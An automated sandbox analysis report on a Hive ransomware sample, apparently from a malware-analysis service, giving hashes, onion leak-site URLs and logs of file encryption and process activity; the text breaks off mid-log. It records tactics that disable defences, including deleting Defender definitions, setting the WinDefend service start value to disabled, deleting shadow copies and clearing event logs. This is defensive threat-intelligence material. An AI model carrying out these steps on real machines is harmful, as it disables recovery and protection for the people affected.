Analysis
-
max time kernel
179s -
max time network
124s -
platform
windows7_x64 -
resource
win7-en-20211208 -
submitted
12-01-2022 14:50
Static task
static1
Behavioral task
behavioral1
Sample
a235bb61d1eb9f2f39767b844c28086a4582e58afdca4678d309395f28a65a5b.bin.sample.exe
Resource
win7-en-20211208
Behavioral task
behavioral2
Sample
a235bb61d1eb9f2f39767b844c28086a4582e58afdca4678d309395f28a65a5b.bin.sample.exe
Resource
win10-en-20211208
General
-
Target
a235bb61d1eb9f2f39767b844c28086a4582e58afdca4678d309395f28a65a5b.bin.sample.exe
-
Size
3.5MB
-
MD5
851a6706bd679387f197f552dae896bc
-
SHA1
ee7d2cf647ee85becd133146b4f600f2fa6965e8
-
SHA256
a235bb61d1eb9f2f39767b844c28086a4582e58afdca4678d309395f28a65a5b
-
SHA512
ba586db7ec4cc3bf89f2e2ad037f1a36e139f55e125087a3840331bb7d47105cffb2d4e46b154fde07007f0e7b8be202fa76f0eca7636409f3c47484bd081a1e
Malware Config
Extracted
C:\Program Files\7-Zip\wPfq_HOW_TO_DECRYPT.txt
hive
http://hiveleakdbtnp76ulyhi52eag6c6tyc3xw7ez7iqy6wc34gd2nekazyd.onion/
http://hivecust6vhekztbqgdnkks64ucehqacge3dij3gyrrpdp57zoq3ooqd.onion/
Signatures
-
Deletes Windows Defender Definitions 2 TTPs 1 IoCs
Uses mpcmdrun utility to delete all AV definitions.
Processes:
MpCmdRun.exepid process 2108 MpCmdRun.exe -
Hive
A ransomware written in Golang first seen in June 2021.
-
Modifies security service 2 TTPs 1 IoCs
Processes:
reg.exedescription ioc process Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\WinDefend\Start = "4" reg.exe -
Clears Windows event logs 1 TTPs
-
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Drops file in Program Files directory 64 IoCs
Processes:
a235bb61d1eb9f2f39767b844c28086a4582e58afdca4678d309395f28a65a5b.bin.sample.exedescription ioc process File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\AN04332_.WMF.VMuWMPCmER_fOivFzC-WS25meDmEEGPOluQ4TT7gRYH_AAAAAAAAAAA0.vl6ia a235bb61d1eb9f2f39767b844c28086a4582e58afdca4678d309395f28a65a5b.bin.sample.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\NA02405_.WMF.VMuWMPCmER_fOivFzC-WS25meDmEEGPOluQ4TT7gRYH_AAAAAAAAAAA0.vl6ia a235bb61d1eb9f2f39767b844c28086a4582e58afdca4678d309395f28a65a5b.bin.sample.exe File opened for modification C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\VisualBasic\1033\MDIParent.zip.VMuWMPCmER_fOivFzC-WS25meDmEEGPOluQ4TT7gRYH_AAAAAAAAAAA0.vl6ia a235bb61d1eb9f2f39767b844c28086a4582e58afdca4678d309395f28a65a5b.bin.sample.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.ui.workbench.swt_0.12.100.v20140530-1436.jar.VMuWMPCmER_fOivFzC-WS25meDmEEGPOluQ4TT7gRYH_IAAAACAAAAA0.vl6ia a235bb61d1eb9f2f39767b844c28086a4582e58afdca4678d309395f28a65a5b.bin.sample.exe File opened for modification C:\Program Files\Java\jre7\lib\security\javafx.policy.VMuWMPCmER_fOivFzC-WS25meDmEEGPOluQ4TT7gRYH_AAAAAAAAAAA0.vl6ia a235bb61d1eb9f2f39767b844c28086a4582e58afdca4678d309395f28a65a5b.bin.sample.exe File opened for modification C:\Program Files\Windows Sidebar\Gadgets\Currency.Gadget\es-ES\currency.html a235bb61d1eb9f2f39767b844c28086a4582e58afdca4678d309395f28a65a5b.bin.sample.exe File opened for modification C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\ja-JP\weather.html a235bb61d1eb9f2f39767b844c28086a4582e58afdca4678d309395f28a65a5b.bin.sample.exe File created C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\VisualBasic\1033\wPfq_HOW_TO_DECRYPT.txt a235bb61d1eb9f2f39767b844c28086a4582e58afdca4678d309395f28a65a5b.bin.sample.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.mbeanbrowser.zh_CN_5.5.0.165303.jar.VMuWMPCmER_fOivFzC-WS25meDmEEGPOluQ4TT7gRYH_AAAAAAAAAAA0.vl6ia a235bb61d1eb9f2f39767b844c28086a4582e58afdca4678d309395f28a65a5b.bin.sample.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Africa\Lagos.VMuWMPCmER_fOivFzC-WS25meDmEEGPOluQ4TT7gRYH_IAAAACAAAAA0.vl6ia a235bb61d1eb9f2f39767b844c28086a4582e58afdca4678d309395f28a65a5b.bin.sample.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\playlist\vimeo.luac.VMuWMPCmER_fOivFzC-WS25meDmEEGPOluQ4TT7gRYH_AAAAAAAAAAA0.vl6ia a235bb61d1eb9f2f39767b844c28086a4582e58afdca4678d309395f28a65a5b.bin.sample.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\FieldTypePreview\BUTTON.JPG.VMuWMPCmER_fOivFzC-WS25meDmEEGPOluQ4TT7gRYH_AAAAAAAAAAA0.vl6ia a235bb61d1eb9f2f39767b844c28086a4582e58afdca4678d309395f28a65a5b.bin.sample.exe File opened for modification C:\Program Files\Windows Sidebar\Gadgets\RSSFeeds.Gadget\ja-JP\css\RSSFeeds.css a235bb61d1eb9f2f39767b844c28086a4582e58afdca4678d309395f28a65a5b.bin.sample.exe File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\Calendar.Gadget\ja-JP\calendar.html a235bb61d1eb9f2f39767b844c28086a4582e58afdca4678d309395f28a65a5b.bin.sample.exe File created C:\Program Files\VideoLAN\VLC\locale\he\LC_MESSAGES\wPfq_HOW_TO_DECRYPT.txt a235bb61d1eb9f2f39767b844c28086a4582e58afdca4678d309395f28a65a5b.bin.sample.exe File opened for modification C:\Program Files\Windows Sidebar\Gadgets\Clock.Gadget\en-US\clock.html a235bb61d1eb9f2f39767b844c28086a4582e58afdca4678d309395f28a65a5b.bin.sample.exe File opened for modification C:\Program Files (x86)\Common Files\microsoft shared\THEMES14\THEMES.INF.VMuWMPCmER_fOivFzC-WS25meDmEEGPOluQ4TT7gRYH_AAAAAAAAAAA0.vl6ia a235bb61d1eb9f2f39767b844c28086a4582e58afdca4678d309395f28a65a5b.bin.sample.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0178348.JPG.VMuWMPCmER_fOivFzC-WS25meDmEEGPOluQ4TT7gRYH_AAAAAAAAAAA0.vl6ia a235bb61d1eb9f2f39767b844c28086a4582e58afdca4678d309395f28a65a5b.bin.sample.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\SO01785_.WMF.VMuWMPCmER_fOivFzC-WS25meDmEEGPOluQ4TT7gRYH_AAAAAAAAAAA0.vl6ia a235bb61d1eb9f2f39767b844c28086a4582e58afdca4678d309395f28a65a5b.bin.sample.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\BabyBoy\babyblue.png a235bb61d1eb9f2f39767b844c28086a4582e58afdca4678d309395f28a65a5b.bin.sample.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\Push\pushplaysubpicture.png a235bb61d1eb9f2f39767b844c28086a4582e58afdca4678d309395f28a65a5b.bin.sample.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Hebron.VMuWMPCmER_fOivFzC-WS25meDmEEGPOluQ4TT7gRYH_AAAAAAAAAAA0.vl6ia a235bb61d1eb9f2f39767b844c28086a4582e58afdca4678d309395f28a65a5b.bin.sample.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\ta\LC_MESSAGES\vlc.mo.VMuWMPCmER_fOivFzC-WS25meDmEEGPOluQ4TT7gRYH_AAAAAAAAAAA0.vl6ia a235bb61d1eb9f2f39767b844c28086a4582e58afdca4678d309395f28a65a5b.bin.sample.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\TR00097_.WMF.VMuWMPCmER_fOivFzC-WS25meDmEEGPOluQ4TT7gRYH_AAAAAAAAAAA0.vl6ia a235bb61d1eb9f2f39767b844c28086a4582e58afdca4678d309395f28a65a5b.bin.sample.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Fonts\Waveform.xml.VMuWMPCmER_fOivFzC-WS25meDmEEGPOluQ4TT7gRYH_AAAAAAAAAAA0.vl6ia a235bb61d1eb9f2f39767b844c28086a4582e58afdca4678d309395f28a65a5b.bin.sample.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\PUBSPAPR\ZPDIR22F.GIF.VMuWMPCmER_fOivFzC-WS25meDmEEGPOluQ4TT7gRYH_AAAAAAAAAAA0.vl6ia a235bb61d1eb9f2f39767b844c28086a4582e58afdca4678d309395f28a65a5b.bin.sample.exe File created C:\Program Files\VideoLAN\VLC\locale\zh_CN\LC_MESSAGES\wPfq_HOW_TO_DECRYPT.txt a235bb61d1eb9f2f39767b844c28086a4582e58afdca4678d309395f28a65a5b.bin.sample.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\Pets\Pets_notes-txt-background.png a235bb61d1eb9f2f39767b844c28086a4582e58afdca4678d309395f28a65a5b.bin.sample.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PE02265_.WMF.VMuWMPCmER_fOivFzC-WS25meDmEEGPOluQ4TT7gRYH_AAAAAAAAAAA0.vl6ia a235bb61d1eb9f2f39767b844c28086a4582e58afdca4678d309395f28a65a5b.bin.sample.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\VCTRN_01.MID.VMuWMPCmER_fOivFzC-WS25meDmEEGPOluQ4TT7gRYH_IAAAACAAAAA0.vl6ia a235bb61d1eb9f2f39767b844c28086a4582e58afdca4678d309395f28a65a5b.bin.sample.exe File opened for modification C:\Program Files\Common Files\Microsoft Shared\Stationery\Bears.htm a235bb61d1eb9f2f39767b844c28086a4582e58afdca4678d309395f28a65a5b.bin.sample.exe File opened for modification C:\Program Files\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\Images\glow.png a235bb61d1eb9f2f39767b844c28086a4582e58afdca4678d309395f28a65a5b.bin.sample.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\NA01066_.WMF.VMuWMPCmER_fOivFzC-WS25meDmEEGPOluQ4TT7gRYH_IAAAACAAAAA0.vl6ia a235bb61d1eb9f2f39767b844c28086a4582e58afdca4678d309395f28a65a5b.bin.sample.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\SO00476_.WMF.VMuWMPCmER_fOivFzC-WS25meDmEEGPOluQ4TT7gRYH_AAAAAAAAAAA0.vl6ia a235bb61d1eb9f2f39767b844c28086a4582e58afdca4678d309395f28a65a5b.bin.sample.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.equinox.p2.core.feature_1.3.0.v20140523-0116\wPfq_HOW_TO_DECRYPT.txt a235bb61d1eb9f2f39767b844c28086a4582e58afdca4678d309395f28a65a5b.bin.sample.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\BabyBoy\navSubpicture.png a235bb61d1eb9f2f39767b844c28086a4582e58afdca4678d309395f28a65a5b.bin.sample.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Beirut.VMuWMPCmER_fOivFzC-WS25meDmEEGPOluQ4TT7gRYH_IAAAACAAAAA0.vl6ia a235bb61d1eb9f2f39767b844c28086a4582e58afdca4678d309395f28a65a5b.bin.sample.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.ui.workbench.renderers.swt_0.12.1.v20140903-1023.jar.VMuWMPCmER_fOivFzC-WS25meDmEEGPOluQ4TT7gRYH_AAAAAAAAAAA0.vl6ia a235bb61d1eb9f2f39767b844c28086a4582e58afdca4678d309395f28a65a5b.bin.sample.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Templates\1033\Access\Northwind.accdt.VMuWMPCmER_fOivFzC-WS25meDmEEGPOluQ4TT7gRYH_AAAAAAAAAAA0.vl6ia a235bb61d1eb9f2f39767b844c28086a4582e58afdca4678d309395f28a65a5b.bin.sample.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0252629.WMF.VMuWMPCmER_fOivFzC-WS25meDmEEGPOluQ4TT7gRYH_AAAAAAAAAAA0.vl6ia a235bb61d1eb9f2f39767b844c28086a4582e58afdca4678d309395f28a65a5b.bin.sample.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PE02950_.WMF.VMuWMPCmER_fOivFzC-WS25meDmEEGPOluQ4TT7gRYH_AAAAAAAAAAA0.vl6ia a235bb61d1eb9f2f39767b844c28086a4582e58afdca4678d309395f28a65a5b.bin.sample.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\SO00670_.WMF.VMuWMPCmER_fOivFzC-WS25meDmEEGPOluQ4TT7gRYH_AAAAAAAAAAA0.vl6ia a235bb61d1eb9f2f39767b844c28086a4582e58afdca4678d309395f28a65a5b.bin.sample.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\PUBSPAPR\ZPDIR44B.GIF.VMuWMPCmER_fOivFzC-WS25meDmEEGPOluQ4TT7gRYH_AAAAAAAAAAA0.vl6ia a235bb61d1eb9f2f39767b844c28086a4582e58afdca4678d309395f28a65a5b.bin.sample.exe File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\en-US\gadget.xml a235bb61d1eb9f2f39767b844c28086a4582e58afdca4678d309395f28a65a5b.bin.sample.exe File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\en-US\css\weather.css a235bb61d1eb9f2f39767b844c28086a4582e58afdca4678d309395f28a65a5b.bin.sample.exe File opened for modification C:\Program Files\Common Files\Microsoft Shared\ink\th-TH\tipresx.dll.mui a235bb61d1eb9f2f39767b844c28086a4582e58afdca4678d309395f28a65a5b.bin.sample.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\VDKHome\ENU\VDK10.RSD.VMuWMPCmER_fOivFzC-WS25meDmEEGPOluQ4TT7gRYH_AAAAAAAAAAA0.vl6ia a235bb61d1eb9f2f39767b844c28086a4582e58afdca4678d309395f28a65a5b.bin.sample.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\Sounds\Places\VIBE.WAV.VMuWMPCmER_fOivFzC-WS25meDmEEGPOluQ4TT7gRYH_IAAAACAAAAA0.vl6ia a235bb61d1eb9f2f39767b844c28086a4582e58afdca4678d309395f28a65a5b.bin.sample.exe File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\Clock.Gadget\images\spacer_highlights.png a235bb61d1eb9f2f39767b844c28086a4582e58afdca4678d309395f28a65a5b.bin.sample.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0152590.WMF.VMuWMPCmER_fOivFzC-WS25meDmEEGPOluQ4TT7gRYH_AAAAAAAAAAA0.vl6ia a235bb61d1eb9f2f39767b844c28086a4582e58afdca4678d309395f28a65a5b.bin.sample.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\PAGESIZE\PGMN048.XML.VMuWMPCmER_fOivFzC-WS25meDmEEGPOluQ4TT7gRYH_AAAAAAAAAAA0.vl6ia a235bb61d1eb9f2f39767b844c28086a4582e58afdca4678d309395f28a65a5b.bin.sample.exe File created C:\Program Files (x86)\Common Files\microsoft shared\OFFICE14\Office Setup Controller\InfoPath.en-us\wPfq_HOW_TO_DECRYPT.txt a235bb61d1eb9f2f39767b844c28086a4582e58afdca4678d309395f28a65a5b.bin.sample.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\OutlookAutoDiscover\YAHOO.ES.XML.VMuWMPCmER_fOivFzC-WS25meDmEEGPOluQ4TT7gRYH_AAAAAAAAAAA0.vl6ia a235bb61d1eb9f2f39767b844c28086a4582e58afdca4678d309395f28a65a5b.bin.sample.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\ResizingPanels\NavigationUp_ButtonGraphic.png a235bb61d1eb9f2f39767b844c28086a4582e58afdca4678d309395f28a65a5b.bin.sample.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.core.feature_1.1.0.v20140827-1444\license.html.VMuWMPCmER_fOivFzC-WS25meDmEEGPOluQ4TT7gRYH_IAAAACAAAAA0.vl6ia a235bb61d1eb9f2f39767b844c28086a4582e58afdca4678d309395f28a65a5b.bin.sample.exe File opened for modification C:\Program Files\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\en-US\picturePuzzle.html a235bb61d1eb9f2f39767b844c28086a4582e58afdca4678d309395f28a65a5b.bin.sample.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0341551.JPG.VMuWMPCmER_fOivFzC-WS25meDmEEGPOluQ4TT7gRYH_IAAAACAAAAA0.vl6ia a235bb61d1eb9f2f39767b844c28086a4582e58afdca4678d309395f28a65a5b.bin.sample.exe File opened for modification C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD10300_.GIF.VMuWMPCmER_fOivFzC-WS25meDmEEGPOluQ4TT7gRYH_AAAAAAAAAAA0.vl6ia a235bb61d1eb9f2f39767b844c28086a4582e58afdca4678d309395f28a65a5b.bin.sample.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\FieldTypePreview\PASSWORD.JPG.VMuWMPCmER_fOivFzC-WS25meDmEEGPOluQ4TT7gRYH_AAAAAAAAAAA0.vl6ia a235bb61d1eb9f2f39767b844c28086a4582e58afdca4678d309395f28a65a5b.bin.sample.exe File created C:\Program Files (x86)\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\wPfq_HOW_TO_DECRYPT.txt a235bb61d1eb9f2f39767b844c28086a4582e58afdca4678d309395f28a65a5b.bin.sample.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\jce.jar.VMuWMPCmER_fOivFzC-WS25meDmEEGPOluQ4TT7gRYH_AAAAAAAAAAA0.vl6ia a235bb61d1eb9f2f39767b844c28086a4582e58afdca4678d309395f28a65a5b.bin.sample.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Juneau.VMuWMPCmER_fOivFzC-WS25meDmEEGPOluQ4TT7gRYH_IAAAACAAAAA0.vl6ia a235bb61d1eb9f2f39767b844c28086a4582e58afdca4678d309395f28a65a5b.bin.sample.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-openide-loaders_ja.jar.VMuWMPCmER_fOivFzC-WS25meDmEEGPOluQ4TT7gRYH_AAAAAAAAAAA0.vl6ia a235bb61d1eb9f2f39767b844c28086a4582e58afdca4678d309395f28a65a5b.bin.sample.exe File opened for modification C:\Program Files (x86)\Microsoft Office\MEDIA\CAGCAT10\J0205462.WMF.VMuWMPCmER_fOivFzC-WS25meDmEEGPOluQ4TT7gRYH_AAAAAAAAAAA0.vl6ia a235bb61d1eb9f2f39767b844c28086a4582e58afdca4678d309395f28a65a5b.bin.sample.exe -
Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
-
Interacts with shadow copies 2 TTPs 1 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
Processes:
vssadmin.exepid process 1960 vssadmin.exe -
Opens file in notepad (likely ransom note) 1 IoCs
Processes:
notepad.exepid process 2572 notepad.exe -
Runs net.exe
-
Runs ping.exe 1 TTPs 1 IoCs
-
Suspicious behavior: EnumeratesProcesses 3 IoCs
Processes:
powershell.exepowershell.exea235bb61d1eb9f2f39767b844c28086a4582e58afdca4678d309395f28a65a5b.bin.sample.exepid process 2140 powershell.exe 2220 powershell.exe 964 a235bb61d1eb9f2f39767b844c28086a4582e58afdca4678d309395f28a65a5b.bin.sample.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
wevtutil.exewevtutil.exewevtutil.exewmic.exewmic.exedescription pid process Token: SeSecurityPrivilege 1500 wevtutil.exe Token: SeBackupPrivilege 1500 wevtutil.exe Token: SeSecurityPrivilege 1916 wevtutil.exe Token: SeBackupPrivilege 1916 wevtutil.exe Token: SeSecurityPrivilege 868 wevtutil.exe Token: SeBackupPrivilege 868 wevtutil.exe Token: SeIncreaseQuotaPrivilege 1992 wmic.exe Token: SeSecurityPrivilege 1992 wmic.exe Token: SeTakeOwnershipPrivilege 1992 wmic.exe Token: SeLoadDriverPrivilege 1992 wmic.exe Token: SeSystemProfilePrivilege 1992 wmic.exe Token: SeSystemtimePrivilege 1992 wmic.exe Token: SeProfSingleProcessPrivilege 1992 wmic.exe Token: SeIncBasePriorityPrivilege 1992 wmic.exe Token: SeCreatePagefilePrivilege 1992 wmic.exe Token: SeBackupPrivilege 1992 wmic.exe Token: SeRestorePrivilege 1992 wmic.exe Token: SeShutdownPrivilege 1992 wmic.exe Token: SeDebugPrivilege 1992 wmic.exe Token: SeSystemEnvironmentPrivilege 1992 wmic.exe Token: SeRemoteShutdownPrivilege 1992 wmic.exe Token: SeUndockPrivilege 1992 wmic.exe Token: SeManageVolumePrivilege 1992 wmic.exe Token: 33 1992 wmic.exe Token: 34 1992 wmic.exe Token: 35 1992 wmic.exe Token: SeIncreaseQuotaPrivilege 1360 wmic.exe Token: SeSecurityPrivilege 1360 wmic.exe Token: SeTakeOwnershipPrivilege 1360 wmic.exe Token: SeLoadDriverPrivilege 1360 wmic.exe Token: SeSystemProfilePrivilege 1360 wmic.exe Token: SeSystemtimePrivilege 1360 wmic.exe Token: SeProfSingleProcessPrivilege 1360 wmic.exe Token: SeIncBasePriorityPrivilege 1360 wmic.exe Token: SeCreatePagefilePrivilege 1360 wmic.exe Token: SeBackupPrivilege 1360 wmic.exe Token: SeRestorePrivilege 1360 wmic.exe Token: SeShutdownPrivilege 1360 wmic.exe Token: SeDebugPrivilege 1360 wmic.exe Token: SeSystemEnvironmentPrivilege 1360 wmic.exe Token: SeRemoteShutdownPrivilege 1360 wmic.exe Token: SeUndockPrivilege 1360 wmic.exe Token: SeManageVolumePrivilege 1360 wmic.exe Token: 33 1360 wmic.exe Token: 34 1360 wmic.exe Token: 35 1360 wmic.exe Token: SeIncreaseQuotaPrivilege 1360 wmic.exe Token: SeSecurityPrivilege 1360 wmic.exe Token: SeTakeOwnershipPrivilege 1360 wmic.exe Token: SeLoadDriverPrivilege 1360 wmic.exe Token: SeSystemProfilePrivilege 1360 wmic.exe Token: SeSystemtimePrivilege 1360 wmic.exe Token: SeProfSingleProcessPrivilege 1360 wmic.exe Token: SeIncBasePriorityPrivilege 1360 wmic.exe Token: SeCreatePagefilePrivilege 1360 wmic.exe Token: SeBackupPrivilege 1360 wmic.exe Token: SeRestorePrivilege 1360 wmic.exe Token: SeShutdownPrivilege 1360 wmic.exe Token: SeDebugPrivilege 1360 wmic.exe Token: SeSystemEnvironmentPrivilege 1360 wmic.exe Token: SeRemoteShutdownPrivilege 1360 wmic.exe Token: SeUndockPrivilege 1360 wmic.exe Token: SeManageVolumePrivilege 1360 wmic.exe Token: 33 1360 wmic.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
a235bb61d1eb9f2f39767b844c28086a4582e58afdca4678d309395f28a65a5b.bin.sample.exenet.exenet.exenet.exenet.exenet.exenet.exenet.exenet.exedescription pid process target process PID 964 wrote to memory of 1876 964 a235bb61d1eb9f2f39767b844c28086a4582e58afdca4678d309395f28a65a5b.bin.sample.exe net.exe PID 964 wrote to memory of 1876 964 a235bb61d1eb9f2f39767b844c28086a4582e58afdca4678d309395f28a65a5b.bin.sample.exe net.exe PID 964 wrote to memory of 1876 964 a235bb61d1eb9f2f39767b844c28086a4582e58afdca4678d309395f28a65a5b.bin.sample.exe net.exe PID 964 wrote to memory of 1876 964 a235bb61d1eb9f2f39767b844c28086a4582e58afdca4678d309395f28a65a5b.bin.sample.exe net.exe PID 1876 wrote to memory of 660 1876 net.exe net1.exe PID 1876 wrote to memory of 660 1876 net.exe net1.exe PID 1876 wrote to memory of 660 1876 net.exe net1.exe PID 1876 wrote to memory of 660 1876 net.exe net1.exe PID 964 wrote to memory of 472 964 a235bb61d1eb9f2f39767b844c28086a4582e58afdca4678d309395f28a65a5b.bin.sample.exe net.exe PID 964 wrote to memory of 472 964 a235bb61d1eb9f2f39767b844c28086a4582e58afdca4678d309395f28a65a5b.bin.sample.exe net.exe PID 964 wrote to memory of 472 964 a235bb61d1eb9f2f39767b844c28086a4582e58afdca4678d309395f28a65a5b.bin.sample.exe net.exe PID 964 wrote to memory of 472 964 a235bb61d1eb9f2f39767b844c28086a4582e58afdca4678d309395f28a65a5b.bin.sample.exe net.exe PID 472 wrote to memory of 272 472 net.exe net1.exe PID 472 wrote to memory of 272 472 net.exe net1.exe PID 472 wrote to memory of 272 472 net.exe net1.exe PID 472 wrote to memory of 272 472 net.exe net1.exe PID 964 wrote to memory of 580 964 a235bb61d1eb9f2f39767b844c28086a4582e58afdca4678d309395f28a65a5b.bin.sample.exe net.exe PID 964 wrote to memory of 580 964 a235bb61d1eb9f2f39767b844c28086a4582e58afdca4678d309395f28a65a5b.bin.sample.exe net.exe PID 964 wrote to memory of 580 964 a235bb61d1eb9f2f39767b844c28086a4582e58afdca4678d309395f28a65a5b.bin.sample.exe net.exe PID 964 wrote to memory of 580 964 a235bb61d1eb9f2f39767b844c28086a4582e58afdca4678d309395f28a65a5b.bin.sample.exe net.exe PID 580 wrote to memory of 1492 580 net.exe net1.exe PID 580 wrote to memory of 1492 580 net.exe net1.exe PID 580 wrote to memory of 1492 580 net.exe net1.exe PID 580 wrote to memory of 1492 580 net.exe net1.exe PID 964 wrote to memory of 1652 964 a235bb61d1eb9f2f39767b844c28086a4582e58afdca4678d309395f28a65a5b.bin.sample.exe net.exe PID 964 wrote to memory of 1652 964 a235bb61d1eb9f2f39767b844c28086a4582e58afdca4678d309395f28a65a5b.bin.sample.exe net.exe PID 964 wrote to memory of 1652 964 a235bb61d1eb9f2f39767b844c28086a4582e58afdca4678d309395f28a65a5b.bin.sample.exe net.exe PID 964 wrote to memory of 1652 964 a235bb61d1eb9f2f39767b844c28086a4582e58afdca4678d309395f28a65a5b.bin.sample.exe net.exe PID 1652 wrote to memory of 1800 1652 net.exe net1.exe PID 1652 wrote to memory of 1800 1652 net.exe net1.exe PID 1652 wrote to memory of 1800 1652 net.exe net1.exe PID 1652 wrote to memory of 1800 1652 net.exe net1.exe PID 964 wrote to memory of 892 964 a235bb61d1eb9f2f39767b844c28086a4582e58afdca4678d309395f28a65a5b.bin.sample.exe net.exe PID 964 wrote to memory of 892 964 a235bb61d1eb9f2f39767b844c28086a4582e58afdca4678d309395f28a65a5b.bin.sample.exe net.exe PID 964 wrote to memory of 892 964 a235bb61d1eb9f2f39767b844c28086a4582e58afdca4678d309395f28a65a5b.bin.sample.exe net.exe PID 964 wrote to memory of 892 964 a235bb61d1eb9f2f39767b844c28086a4582e58afdca4678d309395f28a65a5b.bin.sample.exe net.exe PID 892 wrote to memory of 1324 892 net.exe net1.exe PID 892 wrote to memory of 1324 892 net.exe net1.exe PID 892 wrote to memory of 1324 892 net.exe net1.exe PID 892 wrote to memory of 1324 892 net.exe net1.exe PID 964 wrote to memory of 1620 964 a235bb61d1eb9f2f39767b844c28086a4582e58afdca4678d309395f28a65a5b.bin.sample.exe net.exe PID 964 wrote to memory of 1620 964 a235bb61d1eb9f2f39767b844c28086a4582e58afdca4678d309395f28a65a5b.bin.sample.exe net.exe PID 964 wrote to memory of 1620 964 a235bb61d1eb9f2f39767b844c28086a4582e58afdca4678d309395f28a65a5b.bin.sample.exe net.exe PID 964 wrote to memory of 1620 964 a235bb61d1eb9f2f39767b844c28086a4582e58afdca4678d309395f28a65a5b.bin.sample.exe net.exe PID 1620 wrote to memory of 1984 1620 net.exe net1.exe PID 1620 wrote to memory of 1984 1620 net.exe net1.exe PID 1620 wrote to memory of 1984 1620 net.exe net1.exe PID 1620 wrote to memory of 1984 1620 net.exe net1.exe PID 964 wrote to memory of 1804 964 a235bb61d1eb9f2f39767b844c28086a4582e58afdca4678d309395f28a65a5b.bin.sample.exe net.exe PID 964 wrote to memory of 1804 964 a235bb61d1eb9f2f39767b844c28086a4582e58afdca4678d309395f28a65a5b.bin.sample.exe net.exe PID 964 wrote to memory of 1804 964 a235bb61d1eb9f2f39767b844c28086a4582e58afdca4678d309395f28a65a5b.bin.sample.exe net.exe PID 964 wrote to memory of 1804 964 a235bb61d1eb9f2f39767b844c28086a4582e58afdca4678d309395f28a65a5b.bin.sample.exe net.exe PID 1804 wrote to memory of 1220 1804 net.exe net1.exe PID 1804 wrote to memory of 1220 1804 net.exe net1.exe PID 1804 wrote to memory of 1220 1804 net.exe net1.exe PID 1804 wrote to memory of 1220 1804 net.exe net1.exe PID 964 wrote to memory of 1552 964 a235bb61d1eb9f2f39767b844c28086a4582e58afdca4678d309395f28a65a5b.bin.sample.exe net.exe PID 964 wrote to memory of 1552 964 